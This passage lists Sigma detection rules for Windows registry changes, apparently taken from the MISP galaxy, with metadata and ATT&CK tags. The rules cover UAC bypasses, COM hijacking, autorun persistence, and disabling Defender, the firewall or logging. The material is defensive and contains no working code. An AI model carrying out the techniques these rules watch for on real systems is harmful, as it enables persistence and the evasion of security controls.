filename registry_set_allow_rdp_remote_assistance_feature.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']

RDP Sensitive Settings Changed

Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'

Internal MISP references

UUID 3f6b7b62-61aa-45db-96bd-9c31b36b653c which can be used as unique global reference for RDP Sensitive Settings Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
creation_date 2022/08/06
falsepositive ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)']
filename registry_set_terminal_server_tampering.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1112']

Add Port Monitor Persistence in Registry

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.

Internal MISP references

UUID 944e8941-f6f6-4ee8-ac05-1c224e923c0e which can be used as unique global reference for Add Port Monitor Persistence in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename registry_set_add_port_monitor.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.010']

Office Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID baecf8fb-edbf-429f-9ade-31fc3f22b970 which can be used as unique global reference for Office Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_office.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']

Wow6432Node Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 18f2065c-d36c-464a-a748-bcf909acb2e3 which can be used as unique global reference for Wow6432Node Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node_classes.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Registry Hide Function from User

Detects registry modifications that hide internal tools or functions from the user (malware such as Agent Tesla and HermeticWiper uses this technique)

Internal MISP references

UUID 5a93eb65-dffa-4543-b761-94aa60098fb6 which can be used as unique global reference for Registry Hide Function from User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/18
falsepositive ['Legitimate admin script']
filename registry_set_hide_function_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting

Detects the modification of the Outlook setting "LoadMacroProviderOnBoot", which, if enabled, allows the automatic loading of any configured VBA project/module

Internal MISP references

UUID 396ae3eb-4174-4b9b-880e-dc0364d78a19 which can be used as unique global reference for Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/04/05
falsepositive ['Unknown']
filename registry_set_office_outlook_enable_load_macro_provider_on_boot.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Potential Persistence Via COM Search Order Hijacking

Detects potential COM object hijacking leveraging the COM Search Order

Internal MISP references

UUID a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12 which can be used as unique global reference for Potential Persistence Via COM Search Order Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
creation_date 2020/04/14
falsepositive ['Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level']
filename registry_set_persistence_search_order.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

UAC Bypass Abusing Winsat Path Parsing - Registry

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 6597be7b-ac61-4ac8-bef4-d3ec88174853 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename registry_set_uac_bypass_winsat.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Windows Media Player - Registry

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 5f9db380-ea57-4d1e-beab-8a2d33397e93 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename registry_set_uac_bypass_wmp.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Internet Explorer DisableFirstRunCustomize Enabled

Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.

Internal MISP references

UUID ab567429-1dfb-4674-b6d2-979fd2f9d125 which can be used as unique global reference for Internet Explorer DisableFirstRunCustomize Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['As this is controlled by group policy as well as user settings. Some false positives may occur.']
filename registry_set_internet_explorer_disable_first_run_customize.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Potential Attachment Manager Settings Attachments Tamper

Detects tampering with the Attachment Manager policy settings for attachments (see reference for more information)

Internal MISP references

UUID ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a which can be used as unique global reference for Potential Attachment Manager Settings Attachments Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unlikely']
filename registry_set_policies_attachments_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Windows Defender Exclusions Added - Registry

Detects the setting of Windows Defender exclusions

Internal MISP references

UUID a982fc9c-6333-4ffb-a51d-addb04e8b529 which can be used as unique global reference for Windows Defender Exclusions Added - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/07/06
falsepositive ['Administrator actions']
filename registry_set_defender_exclusions.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Change Winevt Channel Access Permission Via Registry

Detects tampering with the "ChannelAccess" registry key in order to change access to a Windows event channel.

Internal MISP references

UUID 7d9263bd-dc47-4a58-bc92-5474abab390c which can be used as unique global reference for Change Winevt Channel Access Permission Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/17
falsepositive ['Unknown']
filename registry_set_change_winevt_channelaccess.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

WinSock2 Autorun Keys Modification

Detects modification of an autostart extensibility point (ASEP) in the registry.

Internal MISP references

UUID d6c2ce7e-afb5-4337-9ca4-4b5254ed0565 which can be used as unique global reference for WinSock2 Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_winsock2.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential PSFactoryBuffer COM Hijacking

Detects changes to the PSFactory COM InProcServer32 registry key. This technique was used by RomCom to establish persistence by storing a malicious DLL.

Internal MISP references

UUID 243380fa-11eb-4141-af92-e14925e77c1b which can be used as unique global reference for Potential PSFactoryBuffer COM Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk
creation_date 2023/06/07
falsepositive ['Unknown']
filename registry_set_persistence_comhijack_psfactorybuffer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Winget Admin Settings Modification

Detects changes to the AppInstaller (winget) admin settings, such as enabling local manifest installations or disabling installer hash checks

Internal MISP references

UUID 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236 which can be used as unique global reference for Winget Admin Settings Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ["The event doesn't contain information about the type of change. False positives are expected with legitimate changes"]
filename registry_set_winget_admin_settings_tampering.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']

Disabled Windows Defender Eventlog

Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections

Internal MISP references

UUID fcddca7c-b9c0-4ddf-98da-e1e2d18b0157 which can be used as unique global reference for Disabled Windows Defender Eventlog in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/04
falsepositive ['Other Antivirus software installations could cause Windows to disable that eventlog (unknown)']
filename registry_set_disabled_microsoft_defender_eventlog.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Enable Local Manifest Installation With Winget

Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests.

Internal MISP references

UUID fa277e82-9b78-42dd-b05c-05555c7b6015 which can be used as unique global reference for Enable Local Manifest Installation With Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Administrators or developers might enable this for testing purposes or to install custom private packages']
filename registry_set_winget_enable_local_manifest.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']

Enable LM Hash Storage

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

Internal MISP references

UUID c420410f-c2d8-4010-856b-dffe21866437 which can be used as unique global reference for Enable LM Hash Storage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/15
falsepositive ['Unknown']
filename registry_set_system_lsa_nolmhash.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Windows Firewall by Registry

Detects setting EnableFirewall to 0 to disable the Windows firewall

Internal MISP references

UUID e78c408a-e2ea-43cd-b5ea-51975cf358c0 which can be used as unique global reference for Disable Windows Firewall by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_disable_windows_firewall.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Custom Protocol Handler

Detects potential persistence activity via the registration of a new custom protocol handler. Legitimate applications often register protocol handlers during installation, but an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.

Internal MISP references

UUID fdbf0b9d-0182-4c43-893b-a1eaab92d085 which can be used as unique global reference for Potential Persistence Via Custom Protocol Handler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/30
falsepositive ['Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.']
filename registry_set_persistence_custom_protocol_handler.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Internal MISP references

UUID 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 which can be used as unique global reference for IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
creation_date 2023/09/05
falsepositive ['Unknown']
filename registry_set_ie_security_zone_protocol_defaults_downgrade.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Blue Mockingbird - Registry

Attempts to detect system changes made by Blue Mockingbird

Internal MISP references

UUID 92b0b372-a939-44ed-a11b-5136cf680e27 which can be used as unique global reference for Blue Mockingbird - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick)
creation_date 2020/05/14
falsepositive ['Unknown']
filename registry_set_mal_blue_mockingbird.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1112', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Old TLS1.0/TLS1.1 Protocol Version Enabled

Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.

Internal MISP references

UUID 439957a7-ad86-4a8f-9705-a28131c6821b which can be used as unique global reference for Old TLS1.0/TLS1.1 Protocol Version Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Legitimate enabling of the old tls versions due to incompatibility']
filename registry_set_tls_protocol_old_version_enabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Default RDP Port Changed to Non Standard Port

Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

Internal MISP references

UUID 509e84b9-a71a-40e0-834f-05470369bd1e which can be used as unique global reference for Default RDP Port Changed to Non Standard Port in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename registry_set_change_rdp_port.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

Disable Windows Defender Functionalities Via Registry Keys

Detects when attackers or tools disable Windows Defender functionalities via the Windows registry

Internal MISP references

UUID 0eb46774-f1ab-4a74-8238-1155855f2263 which can be used as unique global reference for Disable Windows Defender Functionalities Via Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
creation_date 2022/08/01
falsepositive ['Administrator actions via the Windows Defender interface']
filename registry_set_windows_defender_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook Home Page

Detects potential persistence activity via Outlook home pages.

Internal MISP references

UUID ddd171b5-2cc6-4975-9e78-f0eccd08cc76 which can be used as unique global reference for Potential Persistence Via Outlook Home Page in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/09
falsepositive ['Unknown']
filename registry_set_persistence_outlook_homepage.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Path In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Internal MISP references

UUID 9d8f9bb8-01af-4e15-a3a2-349071530530 which can be used as unique global reference for Suspicious Path In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/21
falsepositive ['Unknown']
filename registry_set_ime_suspicious_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

New Root or CA or AuthRoot Certificate to Store

Detects the addition of new root, CA or AuthRoot certificates to the Windows registry

Internal MISP references

UUID d223b46b-5621-4037-88fe-fda32eead684 which can be used as unique global reference for New Root or CA or AuthRoot Certificate to Store in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Unknown']
filename registry_set_install_root_or_ca_certificat.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

New BgInfo.EXE Custom DB Path Registry Configuration

Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.

Internal MISP references

UUID 53330955-dc52-487f-a3a2-da24dcff99b5 which can be used as unique global reference for New BgInfo.EXE Custom DB Path Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Legitimate use of external DB to save the results']
filename registry_set_bginfo_custom_db.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

UAC Bypass via Sdclt

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

Internal MISP references

UUID 5b872a46-3b90-45c1-8419-f675db8053aa which can be used as unique global reference for UAC Bypass via Sdclt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omer Yampel, Christian Burkard (Nextron Systems)
creation_date 2017/03/17
falsepositive ['Unknown']
filename registry_set_uac_bypass_sdclt.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Outlook Macro Execution Without Warning Setting Enabled

Detects the modification of Outlook security setting to allow unprompted execution of macros.

Internal MISP references

UUID e3b50fa5-3c3f-444e-937b-0a99d33731cd which can be used as unique global reference for Outlook Macro Execution Without Warning Setting Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ScoubiMtl
creation_date 2021/04/05
falsepositive ['Unlikely']
filename registry_set_office_outlook_enable_macro_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.command_and_control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Trust Access Disable For VBApplications

Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.

Internal MISP references

UUID 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf which can be used as unique global reference for Trust Access Disable For VBApplications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/22
falsepositive ['Unlikely']
filename registry_set_office_access_vbom_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Persistence Via Hhctrl.ocx

Detects when an attacker modifies the registry value of "hhctrl" to point to a custom binary

Internal MISP references

UUID f10ed525-97fe-4fed-be7c-2feecca941b1 which can be used as unique global reference for Persistence Via Hhctrl.ocx in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unlikely']
filename registry_set_hhctrl_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Registry Disable System Restore

Detects the modification of the registry to disable System Restore on the computer

Internal MISP references

UUID 5de03871-5d46-4539-a82d-3aa992a69a83 which can be used as unique global reference for Registry Disable System Restore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Unknown']
filename registry_set_disable_system_restore.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Shim Database In Uncommon Location

Detects the installation of a new shim database where the file is located in a non-default location

Internal MISP references

UUID 6b6976a3-b0e6-4723-ac24-ae38a737af41 which can be used as unique global reference for Potential Persistence Via Shim Database In Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/01
falsepositive ['Unknown']
filename registry_set_persistence_shim_database_uncommon_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Potential Registry Persistence Attempt Via Windows Telemetry

Detects potential persistence behavior using the Windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collection. This binary was created to be easily extensible, and to that end it relies on the registry to instruct it which commands to run. The problem is that it will run any arbitrary command without restriction of location or type.

Internal MISP references

UUID 73a883d0-0348-4be4-a8d8-51031c2564f8 which can be used as unique global reference for Potential Registry Persistence Attempt Via Windows Telemetry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Lednyov Alexey, oscd.community, Sreeman
creation_date 2020/10/16
falsepositive ['Unknown']
filename registry_set_telemetry_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

PowerShell Logging Disabled Via Registry Key Tampering

Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging, or transcription and script execution logging

Internal MISP references

UUID fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 which can be used as unique global reference for PowerShell Logging Disabled Via Registry Key Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/02
falsepositive ['Unknown']
filename registry_set_powershell_logging_disabled.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

New BgInfo.EXE Custom WMI Query Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute a custom WMI query via "BgInfo.exe"

Internal MISP references

UUID cd277474-5c52-4423-a52b-ac2d7969902f which can be used as unique global reference for New BgInfo.EXE Custom WMI Query Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Legitimate WMI query']
filename registry_set_bginfo_custom_wmi_query.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Winlogon AllowMultipleTSSessions Enable

Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop connection sessions to be opened at once. This is often used by attackers as a way to connect to an RDP session without disconnecting the other users

Internal MISP references

UUID f7997770-92c3-4ec9-b112-774c4ef96f96 which can be used as unique global reference for Winlogon AllowMultipleTSSessions Enable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Legitimate use of the multi session functionality']
filename registry_set_winlogon_allow_multiple_tssessions.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Add DisallowRun Execution to Registry

Detects setting DisallowRun to 1 to prevent users from running specific programs

Internal MISP references

UUID 275641a5-a492-45e2-a817-7c81e9d9d3e9 which can be used as unique global reference for Add DisallowRun Execution to Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_disallowrun_execution.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

IE Change Domain Zone

Hides the file extension through modification of the registry

Internal MISP references

UUID 45e112d0-7759-4c2a-aa36-9f8fb79d3393 which can be used as unique global reference for IE Change Domain Zone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Administrative scripts']
filename registry_set_change_security_zones.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

Potential Persistence Via DLLPathOverride

Detects when an attacker adds a new "DLLPathOverride" value under the "Natural Language" key in order to achieve persistence; the referenced DLL is loaded by the "SearchIndexer.exe" process

Internal MISP references

UUID a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 which can be used as unique global reference for Potential Persistence Via DLLPathOverride in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unknown']
filename registry_set_persistence_natural_language.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Lolbas OneDriveStandaloneUpdater.exe Proxy Download

Detects setting a custom URL for OneDriveStandaloneUpdater.exe so that it downloads a file from the Internet without any anomalous executable being launched with suspicious arguments. The downloaded file is written to C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json

Internal MISP references

UUID 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d which can be used as unique global reference for Lolbas OneDriveStandaloneUpdater.exe Proxy Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/28
falsepositive ['Unknown']
filename registry_set_lolbin_onedrivestandaloneupdater.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

UAC Bypass via Event Viewer

Detects UAC bypass method using Windows event viewer

Internal MISP references

UUID 7c81fec3-1c1d-43b0-996a-46753041b1b6 which can be used as unique global reference for UAC Bypass via Event Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/19
falsepositive ['Unknown']
filename registry_set_uac_bypass_eventvwr.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Wow6432Node Windows NT CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 480421f9-417f-4d3b-9552-fd2728443ec8 which can be used as unique global reference for Wow6432Node Windows NT CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Mpnotify

Detects when an attacker registers a new "mpnotify" value under the Winlogon key, pointing at a custom DLL, for persistence and defense evasion

Internal MISP references

UUID 92772523-d9c1-4c93-9547-b0ca500baba3 which can be used as unique global reference for Potential Persistence Via Mpnotify in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
